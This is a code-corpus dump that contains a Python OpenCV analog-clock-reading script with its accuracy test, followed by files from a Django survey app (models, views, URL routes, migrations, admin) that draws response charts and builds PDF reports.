## Takes an input image, retrieves the ROI, get clock hands, store properties of clockhands in global variables glob_lineCoords & glob_clockhands, return image with lines on it
## -This process is run a few times to make sure the probabilistic huogh transform gets both clock hands
def process_img(original_image):
#See top for var explanations
global prevRoi
global clockCenter
global glob_lineCoords
global glob_clockhands
processed_img = cv2.cvtColor(original_image, cv2.COLOR_BGR2GRAY)
output = original_image.copy()
# detect circles in the image
circles = cv2.HoughCircles(processed_img, cv2.HOUGH_GRADIENT, 1.1, 100, maxRadius=300)
#Dimensions of ROI
roiDim = []
# ensure at least some circles were found
if circles is not None:
# convert the (x, y) coordinates and radius of the circles to integers
circles = np.round(circles[0, :]).astype("int")
# loop over the (x, y) coordinates and radius of the circles
maxR = 0
for (x, y, r) in circles:
# draw the circle in the output image, then draw a rectangle
# corresponding to the center of the circle
cv2.circle(output, (x, y), r, (0, 255, 0), 4)
cv2.rectangle(output, (x - 5, y - 5), (x + 5, y + 5), (0, 128, 255), -1)
clockCenter=(x,y)
if(r > maxR):
roiDim = [[x-r-5, y-r-5], [x+r+5, y-r-5], [x+r+5, y+r+5],[x-r-5, y+r+5]]
prevRoi = roiDim
if len(roiDim) == 0:
roiDim = prevRoi
##-----------------DEPRECATED
###kernel = np.ones((3,3),np.uint8)
###processed_img = cv2.erode(processed_img,kernel,iterations = 1)
###processed_img = auto_canny(processed_img)
###processed_img = cv2.GaussianBlur(processed_img, (3, 3), 0)
###edges = cv2.Canny(processed_img,50, 150, apertureSize=3)
###edges = cv2.morphologyEx(edges, cv2.MORPH_CLOSE, kernel)
#see ROI notes in notebook
vertices = np.array(roiDim)
processed_img = roi(processed_img, [vertices])
minLineLength = 50
maxLineGap = 3
#each hand has a x0,x1,y0,y1 and an angle where 0 is hours, 1 is minutes, 2 is seconds
edges = cv2.Canny(processed_img, 50, 200)
###edges = auto_canny(processed_img)
kernel = np.ones((6,6),np.uint8)
edges = cv2.morphologyEx(edges, cv2.MORPH_CLOSE, kernel)
###edges = cv2.morphologyEx(edges, cv2.MORPH_OPEN, np.ones((2,2), np.uint8))
lines = probabilistic_hough_line(edges, threshold=5, line_length=minLineLength, line_gap=maxLineGap)
##------------------DEPRECATED
###lines = cv2.HoughLines(edges, 1, np.pi/180, 60)
###lines = cv2.HoughLinesP(edges, 1, np.pi/180, 60, minLineLength, maxLineGap)
#clockhands = [[(0,0), (1,1), np.pi], [(0,0), (q1,1), np.pi], [(0,0), (1,1), np.pi]]
#maxLine = 0
#minLine = 1000
lineCoords = [[]]
x, y = clockCenter
lineAngs = []
newAng = True
maxima1 = 0
maxima2 = 0
#Placeholder for blob detection, checks if root of line is within a set distance of the center
distCenter = 15
###clockhands = [0, 0]
if lines is not None:
for line in lines:
### for x1,y1,x2,y2 in line: #For OpenCv's HoughLinesP
p0, p1 = line
x1, y1 = p0
x2, y2 = p1
#Makes the point closest to the center is x1 y1
if(abs(y2 - y) < abs(y1 - y) and abs(x2-x) < abs(x1-x)):
temp = x1
x1 = x2
x2 = temp
temp = y1
y1 = y2
y2 = temp
lenLine = ((x2-x1) ** 2 + (y2-y1) ** 2) ** 0.5
if(((abs(x-x1) < distCenter and abs(y-y1) < distCenter) or (abs(x-x2) < distCenter and abs(y-y2) < distCenter)) and lenLine > minLineLength):
lineCoords.append([(x1,y1), (x2,y2)])
###ang = np.arctan2((y1-y2),(x2-x1))
#Bottom of screen = max(y), rotate unit circle to match the clock
ang = np.arctan2((x2-x1),(y1-y2))
ang = ang * 180 / math.pi
ang = (ang + 360) % 360 #Convert angle to extend range from [-180, 180] to [0, 360]
#Check if angle of line is already stored
for lineAng in lineAngs:
if(abs(ang- lineAng) <= 5): #use 5, since 6 degrees is one tick on the clock
newAng = False #Keep False
## -------------------DEPRECATED
### if(lenLine > maxima1 and newAng):
### maxima1 = lenLine
### clockhands[0] = ang
### elif(lenLine > maxima2 and newAng):
### maxima2 = lenLine
### clockhands[1] = ang
#Checks if angle is a new angle
if(newAng):
lineAngs.append(ang)
cv2.line(original_image,(x1,y1),(x2,y2),(0,0,255),2) #Draw line
##If ClockHands are empty, and angles are different from existing angles, save line properties
if(len(glob_clockhands[0]) == 0):
glob_clockhands[0] = [ang, lenLine]
glob_lineCoords[0] = [(x1,y1), (x2,y2)]
elif(len(glob_clockhands[1]) == 0):
if(abs(ang - glob_clockhands[0][0]) > 10):
glob_clockhands[1] = [ang, lenLine]
glob_lineCoords[1] = [(x1,y1), (x2,y2)]
else:
#If both clockhand slots are full, check if the angular difference between the current angle is bigger than the other two, replace with the bigger angular difference
if(abs(ang - glob_clockhands[0][0]) > abs(glob_clockhands[0][0] - glob_clockhands[1][0]) + 5 and abs(ang - glob_clockhands[0][0]) < 350):
glob_clockhands[1] = [ang, lenLine]
glob_lineCoords[1] = [(x1,y1), (x2,y2)]
elif(abs(ang - glob_clockhands[1][0]) > abs(glob_clockhands[1][0] - glob_clockhands[0][0]) + 5 and abs(ang - glob_clockhands[0][0]) < 350):
glob_clockhands[0] = [ang, lenLine]
glob_lineCoords[0] = [(x1,y1), (x2,y2)]
elif(abs(ang - glob_clockhands[0][0]) < abs(glob_clockhands[0][0] - glob_clockhands[1][0]) + 5):
if(lenLine > glob_clockhands[1][1] and (abs(ang - glob_clockhands[1][0]) < 10 or abs(ang - glob_clockhands[1][0]) > 350)):
glob_clockhands[1] = [ang, lenLine]
glob_lineCoords[1] = [(x1,y1), (x2,y2)]
elif(abs(ang - glob_clockhands[1][0]) < abs(glob_clockhands[1][0] - glob_clockhands[0][0]) + 5):
if(lenLine > glob_clockhands[0][1] and (abs(ang - glob_clockhands[0][0]) < 10 or abs(ang - glob_clockhands[0][0]) > 350)):
glob_clockhands[0] = [ang, lenLine]
glob_lineCoords[0] = [(x1,y1), (x2,y2)]
##-----------------------------------------DEPRECATED
# elif(newAng):
# #If both clockhand slots are full, check if the angular difference between the current angle is bigger than the other two, replace with the bigger angular difference
# if(abs(ang - glob_clockhands[0][0]) > abs(glob_clockhands[0][0] - glob_clockhands[1][0]) + 5 and abs(ang - glob_clockhands[0][0]) < 350):
# glob_clockhands[1] = [ang, lenLine]
# glob_lineCoords[1] = [(x1,y1), (x2,y2)]
# elif(abs(ang - glob_clockhands[1][0]) > abs(glob_clockhands[1][0] - glob_clockhands[0][0]) + 5 and abs(ang - glob_clockhands[1][0]) < 350):
# glob_clockhands[0] = [ang, lenLine]
# glob_lineCoords[0] = [(x1,y1), (x2,y2)]
# elif(abs(ang - glob_clockhands[0][0]) < abs(glob_clockhands[0][0] - glob_clockhands[1][0]) + 5 and abs(ang - glob_clockhands[0][0]) < 350):
# if(lenLine > glob_clockhands[1][1]):
# glob_clockhands[1] = [ang, lenLine]
# glob_lineCoords[1] = [(x1,y1), (x2,y2)]
# elif(abs(ang - glob_clockhands[1][0]) < abs(glob_clockhands[1][0] - glob_clockhands[0][0]) + 5 and abs(ang - glob_clockhands[1][0]) < 350):
# if(lenLine > glob_clockhands[0][1]):
# glob_clockhands[0] = [ang, lenLine]
# glob_lineCoords[0] = [(x1,y1), (x2,y2)]
### else:
### for i in range(0, len(glob_clockhands)):
### if(abs(abs(glob_clockhands[i][0]) - abs(ang))>5)
##------------------DEPRECATED
# for rho,theta in line: #For OpenCv's HoughLines
# a = np.cos(theta)
# b = np.sin(theta)
# x0 = a*rho
# y0 = b*rho
# x1 = int(x0 + 1000*(-b))
# y1 = int(y0 + 1000*(a))
# x2 = int(x0 - 1000*(-b))
# y2 = int(y0 - 1000*(a))
# lenLine = ((x2-x1) ** 2 + (y2-y1) ** 2) ** 0.5
# if(abs(x-x1) < 25 and abs(y-y1) < 25):
# cv2.line(processed_img,(x1,y1),(x2,y2),(0,255,0),2)
##----------------------DEPRECATED
#kernel = np.ones((5,5),np.uint8)
#edges = cv2.morphologyEx(edges, cv2.MORPH_CLOSE, kernel )
#lines = cv2.HoughLinesP(edges, 1, np.pi/180,10,100, minLineLength, maxLineGap)
#newIm = draw_lines(np.zeros(processed_img.shape), lines)
return original_image
##Compute time based on angles and return time in a list of the form [HH, mm, ss]
def computeTime(ang_H, ang_M, ang_S=0):
mm = round(abs(ang_M) / 6)
ss = round(abs(ang_S) / 6)
errHH = round((abs(ang_H) / 6) /5) #Hours, rounded normally, used to check the hours reading is accurate
HH = (abs(ang_H) / 6) // 5 #Floored down to the nearest integer
if(ss == 60):
mm += 1
ss = 0
if(mm == 60):
HH += 1
mm = 0
elif(mm < 30 and (errHH != HH)): #Checks if the errH is rounded up while HH is rounded down and minutes are < 30 minutes,
# if so, then the reading is inaccurate and we need to increment HH by 1
HH += 1
elif(mm>45 and (errHH == HH)): #Checks if the angle for the hour hand may have been misread as the next hour
HH += -1
if(HH <= 0):
HH = 12 + HH
###return [int(HH), int(mm), int(ss)]
return [int(HH), int(mm)]
#Convert time from previous function into a string of the form HH:mm:ss
def timeToString(temp):
for i in range(0, len(temp)):
temp[i] = str(temp[i])
return ":".join(temp)
def main(imname):
last_time = time.time()
count = 0
screen = None
numIterations = 20
while(count < numIterations):
count += 1
"""
------------------------------------------------------------------------------
$CHOOSE IMAGE INPUT HERE$
Set screen to be input image; imread, ImageGrab, etc...
Feed it one frame at a time
"""
#screen = ImageGrab.grab(bbox=(0, 100, 750, 600)) #x, y, w , h | Screen capture input
#runBool = True
screen = cv2.imread(imname)
if(screen is None):
print('File Not Found')
return
###screen_np= cv2.resize(np.array(screen), (960,540))
screen_np = np.array(screen)
new_screen = process_img(screen_np)
#print('Loop took {} seconds'.format(time.time() -last_time))
#last_time = time.time()
if __name__ == '__main__':
try:
cv2.imshow('window', new_screen)
except:
print("Imshow error")
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
#Show final image with lines on it
screen_np = np.array(screen)
original_image = screen_np.copy()
#print(glob_clockhands)
if(len(glob_clockhands[1]) ==0):
if __name__ == '__main__':
print("Could not detect all clock hands")
else:
for line in glob_lineCoords:
cv2.line(screen_np,line[0],line[1],(0,0,255),2)
ang_H = 0
ang_M = 0
if(glob_clockhands[0][1] > glob_clockhands[1][1]):
ang_H = glob_clockhands[1][0]
ang_M = glob_clockhands[0][0]
else:
ang_H = glob_clockhands[0][0]
ang_M = glob_clockhands[1][0]
clocktime = computeTime(ang_H, ang_M)
if __name__ == '__main__':
print(timeToString(clocktime))
if not __name__ == '__main__':
return clocktime
#---USE THIS TO VIEW OUTPUT OF THE IMAGE
if __name__ == '__main__':
final = np.concatenate((original_image, screen_np), axis=1)
try:
cv2.imshow('window', final)
except:
print("Imshow error")
cv2.waitKey()
cv2.destroyAllWindows()
if __name__ == '__main__':
main('clock20.jpg')
|
{"/clockTest.py": ["/MS_ClockReader.py"]}
|
34,493
|
msheroubi/AnalogClockReader
|
refs/heads/master
|
/clockTest.py
|
import MS_ClockReader
import importlib
import time
'''
=========================================================================
CLOCK TEST FILE-this test file is not a 100% accurate in its FALSE (X) readings,
for false readings, if you run the main file (MS_ClockReader)
with the image that failed, aside from clock10/clock16/clock20/clock22,
which are examples of limitations, every other image should have more than 50% accuracy
I am not sure why, I need to reload the ClockReader file often for it to keep working, it seems fine as of right now,
but just incase you run it and get different results, that's why.
=========================================================================
'''
times = {'clock1.jpg': [10, 10],
'clock2.jpg': [10,11],
'clock3.jpg': [10,10],
'clock4.jpg': [1,50],
'clock5.jpg': [10,10],
'clock6.jpg': [10,10],
'clock7.jpg': [1,50],
'clock8.jpg': [1,50],
'clock9.jpg': [2,58],
'clock10.jpg': [10,10],
'clock11.jpg': [8,22],
'clock12.jpg': [12,12],
'clock13.jpg': [6,53],
'clock14.jpg': [10,10],
'clock15.jpg': [10,10],
'clock16.jpg': [9,5],
'clock17.jpg': [10,10],
'clock18.jpg': [10,25],
'clock19.jpg': [1,50],
'clock20.jpg': [10,10],
'clock21.jpg': [3,0],
'clock22.jpg': [6,10],
'clock23.jpg': [10,29],
'clock24.jpg': [1,50],
'clock25.jpg': [1,50],
'clock26.jpg': [3,0],
'clock27.jpg': [11,5],
'clock28.jpg': [3,39],
'clock29.jpg': [10,10],
'clock30.jpg': [10,8] }
totalCount = 0
totalSuccess = 0
numFiles = 30
loopsPerFile =10
errThresh = 5
for i in range(1, numFiles + 1):
filename = 'clock' + str(i) +'.jpg'
numSuccess = 0
count = 0
realHour = times[filename][0]
realMinute = times[filename][1]
print(filename, end="| ")
while(count < loopsPerFile):
count += 1
totalCount += 1
clocktime = MS_ClockReader.main(filename)
if(clocktime is None):
print('?', end="")
continue
# print(realHour," ", realMinute)
# print(time)
hour = clocktime[0]
minutes = clocktime[1]
if(hour == realHour and abs(minutes - realMinute) < errThresh):
numSuccess += 1
totalSuccess += 1
print('Y', end="")
else:
print('X', end="")
importlib.reload(MS_ClockReader)
importlib.reload(MS_ClockReader)
print(" | Accuracy: ", (round(numSuccess/count * 100)))
|
{"/clockTest.py": ["/MS_ClockReader.py"]}
|
34,502
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/models.py
|
from django.db import models
from ts.models import Clients
class SurveyQuestion(models.Model):
QTYPES = ((1, 'TEXT'), (2, 'CHOICE'))
company_id = models.ForeignKey(Clients, on_delete=models.CASCADE)
ques_id = models.AutoField(primary_key=True)
ques_category = models.CharField(default="GENERAL", max_length=255)
ques_type = models.IntegerField(default=1, choices=QTYPES)
ques_text = models.CharField(max_length=255)
ques_meta_1 = models.CharField(max_length=255)
ques_meta_2 = models.CharField(max_length=255)
def __str__(self):
return self.company_id.client_name + ": " + self.ques_text
#return self.ques_text
class SurveyQuestionChoice(models.Model):
company_id = models.ForeignKey(Clients, on_delete=models.CASCADE)
ques_id = models.ForeignKey(SurveyQuestion, on_delete=models.CASCADE)
choice_text = models.CharField(max_length=255)
def __str__(self):
return "(" + self.ques_id.ques_text + ") " + self.choice_text
class SurveyResponse(models.Model):
company_id = models.ForeignKey(Clients, on_delete=models.CASCADE)
ques_id = models.ForeignKey(SurveyQuestion, on_delete=models.CASCADE)
user_response = models.CharField(max_length=255)
def __str__(self):
return self.user_response
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,503
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/views.py
|
from django.shortcuts import render
from django.views import generic
from .models import Clients
class indexView(generic.ListView):
"""
Handle index page request.
"""
template_name = 'ts/index.html'
context_object_name = 'latest_survey_list'
def get_queryset(self):
return Clients.objects.all()
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,504
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/migrations/0006_surveyquestion_ques_category.py
|
# Generated by Django 3.1 on 2021-07-10 05:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('client', '0005_remove_surveyquestion_ques_category'),
]
operations = [
migrations.AddField(
model_name='surveyquestion',
name='ques_category',
field=models.CharField(default='GENERAL', max_length=255),
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,505
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/urls.py
|
from django.urls import path
from . import views
app_name = "client"
urlpatterns = [
path('<int:pk>/', views.index, name='index'),
path('<int:pk>/survey/', views.survey, name='survey'),
path('<int:pk>/save/', views.save, name='save'),
path('<int:pk>/feedback/', views.feedback, name='feedback')
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,506
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/migrations/0003_auto_20210708_2332.py
|
# Generated by Django 3.1 on 2021-07-08 23:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('client', '0002_auto_20210702_1731'),
]
operations = [
migrations.AlterField(
model_name='surveyquestion',
name='ques_type',
field=models.IntegerField(choices=[(1, 'TEXT'), (2, 'CHOICE'), (3, 'MULTI CHOICE')], default=1),
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,507
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/admin.py
|
from django.contrib import admin
from .models import Clients
admin.site.register(Clients)
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,508
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0005_auto_20210625_1054.py
|
# Generated by Django 3.1 on 2021-06-25 10:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ts', '0004_auto_20210625_1053'),
]
operations = [
migrations.AlterField(
model_name='clients',
name='status',
field=models.IntegerField(default=1),
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,509
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0006_auto_20210625_1055.py
|
# Generated by Django 3.1 on 2021-06-25 10:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ts', '0005_auto_20210625_1054'),
]
operations = [
migrations.AlterField(
model_name='clients',
name='company_id',
field=models.AutoField(primary_key=True, serialize=False),
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,510
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/migrations/0009_auto_20210710_1349.py
|
# Generated by Django 3.1 on 2021-07-10 13:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ts', '0012_auto_20210701_1820'),
('client', '0008_syrveyresponse'),
]
operations = [
migrations.RenameModel(
old_name='SyrveyResponse',
new_name='SurveyResponse',
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,511
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/admin.py
|
from django.contrib import admin
from .models import SurveyQuestion, SurveyQuestionChoice
admin.site.register(SurveyQuestion)
admin.site.register(SurveyQuestionChoice)
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,512
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0007_auto_20210625_1133.py
|
# Generated by Django 3.1 on 2021-06-25 11:33
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ts', '0006_auto_20210625_1055'),
]
operations = [
migrations.RenameField(
model_name='clients',
old_name='name',
new_name='client_name',
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,513
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/apps.py
|
from django.apps import AppConfig
class TsConfig(AppConfig):
name = 'ts'
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,514
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0012_auto_20210701_1820.py
|
# Generated by Django 3.1 on 2021-07-01 18:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ts', '0011_auto_20210628_1647'),
]
operations = [
migrations.RemoveField(
model_name='surveyquestionchoice',
name='company_id',
),
migrations.RemoveField(
model_name='surveyquestionchoice',
name='ques_id',
),
migrations.DeleteModel(
name='SurveyQuestion',
),
migrations.DeleteModel(
name='SurveyQuestionChoice',
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,515
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0010_auto_20210625_1222.py
|
# Generated by Django 3.1 on 2021-06-25 12:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('ts', '0009_auto_20210625_1208'),
]
operations = [
migrations.AlterField(
model_name='surveyquestionchoice',
name='company_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ts.clients'),
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,516
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/migrations/0001_initial.py
|
# Generated by Django 3.1 on 2021-07-01 18:20
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('ts', '0012_auto_20210701_1820'),
]
operations = [
migrations.CreateModel(
name='SurveyQuestion',
fields=[
('ques_id', models.AutoField(primary_key=True, serialize=False)),
('ques_type', models.IntegerField(default=0)),
('ques_text', models.CharField(max_length=255)),
('ques_meta_1', models.CharField(max_length=255)),
('ques_meta_2', models.CharField(max_length=255)),
('company_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ts.clients')),
],
),
migrations.CreateModel(
name='SurveyQuestionChoice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.CharField(max_length=255)),
('company_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ts.clients')),
('ques_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='client.surveyquestion')),
],
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,517
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0011_auto_20210628_1647.py
|
# Generated by Django 3.1 on 2021-06-28 16:47
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ts', '0010_auto_20210625_1222'),
]
operations = [
migrations.AlterModelOptions(
name='clients',
options={'verbose_name_plural': 'Clients'},
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,518
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/views.py
|
from django.shortcuts import render, get_object_or_404, get_list_or_404
from django.db.models import Count, Avg, Max, Min
from ts.models import *
from .models import SurveyQuestion, SurveyQuestionChoice, SurveyResponse
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from fpdf import FPDF
class PDF(FPDF):
def __init__(self, client_name):
super().__init__()
self.WIDTH = 210
self.HEIGHT = 297
self.name = client_name
def header(self):
self.image('ts/static/ts/index.png', 10, 3, 33)
self.set_font('Arial', 'B', 11)
self.cell(self.WIDTH - 80)
self.cell(60, 1, self.name.upper() + ' SURVEY REPORT', 0, 0, 'R')
self.ln(20)
def footer(self):
self.set_y(-15)
self.set_font('Arial', 'I', 8)
self.set_text_color(128)
self.cell(0, 10, 'Page ' + str(self.page_no()), 0, 0, 'C')
def page_body(self, images):
self.image(images, 15, 35, self.WIDTH)
def print_page(self, images):
self.add_page()
self.page_body(images)
def index(request, pk):
"""
This view is for
creating dynamic
and personalized
client home page
"""
ques_obj = SurveyQuestion.objects.filter(company_id=pk)
res_obj = SurveyResponse.objects.filter(company_id=pk)
total_survey_question = ques_obj.count()
total_survey_response = res_obj.count()//total_survey_question
stats_list = []
charts = []
for q in ques_obj:
if q.ques_type == 1:
res_obj = SurveyResponse.objects.filter(ques_id_id = q.ques_id)
stat_dic = res_obj.aggregate( \
Avg('user_response'), \
Max('user_response'), \
Min('user_response'))
stat_dic['ques'] = q.ques_text
stats_list.append(stat_dic)
elif q.ques_type == 2:
choice_list = []
res_list = []
stats = []
res_obj = SurveyResponse.objects.filter(ques_id_id = q.ques_id)
choice_obj = SurveyQuestionChoice.objects.filter(ques_id_id = q.ques_id)
choice_list = [c.choice_text for c in choice_obj]
res_list = [r.user_response for r in res_obj]
stats = [res_list.count(i) for i in set(res_list)]
name = str(q.company_id_id) + '_' + str(q.ques_id)
plt.pie(stats, labels=set(res_list), autopct='%1.0f%%')
plt.title(q.ques_text)
plt.legend()
plt.savefig('client/static/client/charts/' + name + '.png', \
transparent=True)
plt.close()
charts.append(name)
context = {
'client': get_object_or_404(Clients, pk=pk),
'total_ques': total_survey_question,
'total_response': total_survey_response,
'charts': charts,
'stats': stats_list
}
pdf = PDF(context['client'].client_name)
for i in charts:
pdf.print_page('client/static/client/charts/' + i + '.png')
pdf.output('client/static/client/' + str(pk) +'.pdf', 'F')
return render(request, "client/index.html", context)
def survey(request, pk):
"""
This view is for
creating dynamic
and personalized
client survey page
"""
context = {
'client': get_object_or_404(Clients, pk=pk),
'categories': SurveyQuestion.objects.filter(company_id=pk).values('ques_category').annotate(Count('ques_category')).order_by(),
'ques_set': SurveyQuestion.objects.filter(company_id=pk),
'choice_set': SurveyQuestionChoice.objects.filter(company_id=pk)
}
return render(request, "client/survey.html", context)
def save(request, pk):
"""
This view is for
saving participant
response into db
"""
context = {
'client': get_object_or_404(Clients, pk=pk)
}
for res in request.POST:
if res == "csrfmiddlewaretoken" or res == "submit":
continue
response = SurveyResponse(
company_id = Clients.objects.get(pk=pk),
ques_id = SurveyQuestion.objects.get(pk=int(res)),
user_response=request.POST[res]
)
response.save()
return render(request, "client/thanks.html", context)
def feedback(request, pk):
"""
This view is for
saving participant
feedback regarding
survey
"""
context = {'client': get_object_or_404(Clients, pk=pk)}
return render(request, "client/feedback.html", context)
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,519
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0004_auto_20210625_1053.py
|
# Generated by Django 3.1 on 2021-06-25 10:53
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ts', '0003_auto_20210625_1052'),
]
operations = [
migrations.RenameField(
model_name='clients',
old_name='client_name',
new_name='name',
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,520
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0002_auto_20210625_1050.py
|
# Generated by Django 3.1 on 2021-06-25 10:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ts', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='clients',
old_name='client_name',
new_name='name',
),
migrations.RemoveField(
model_name='clients',
name='id',
),
migrations.AddField(
model_name='clients',
name='company_id',
field=models.IntegerField(default=1, primary_key=True, serialize=False),
preserve_default=False,
),
migrations.AddField(
model_name='clients',
name='status',
field=models.IntegerField(default=1),
preserve_default=False,
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,521
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/migrations/0002_auto_20210702_1731.py
|
# Generated by Django 3.1 on 2021-07-02 17:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('client', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='surveyquestion',
name='ques_type',
field=models.IntegerField(choices=[(1, 'TEXT'), (2, 'CHOICE'), (3, 'MULTI CHOICE')], default=0),
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,522
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/models.py
|
from django.db import models
class Clients(models.Model):
company_id = models.AutoField(primary_key=True)
client_name = models.CharField(max_length=100)
survey_start_date = models.DateTimeField()
status = models.IntegerField(default=1)
class Meta:
verbose_name_plural = "Clients"
def __str__(self):
return self.client_name
|
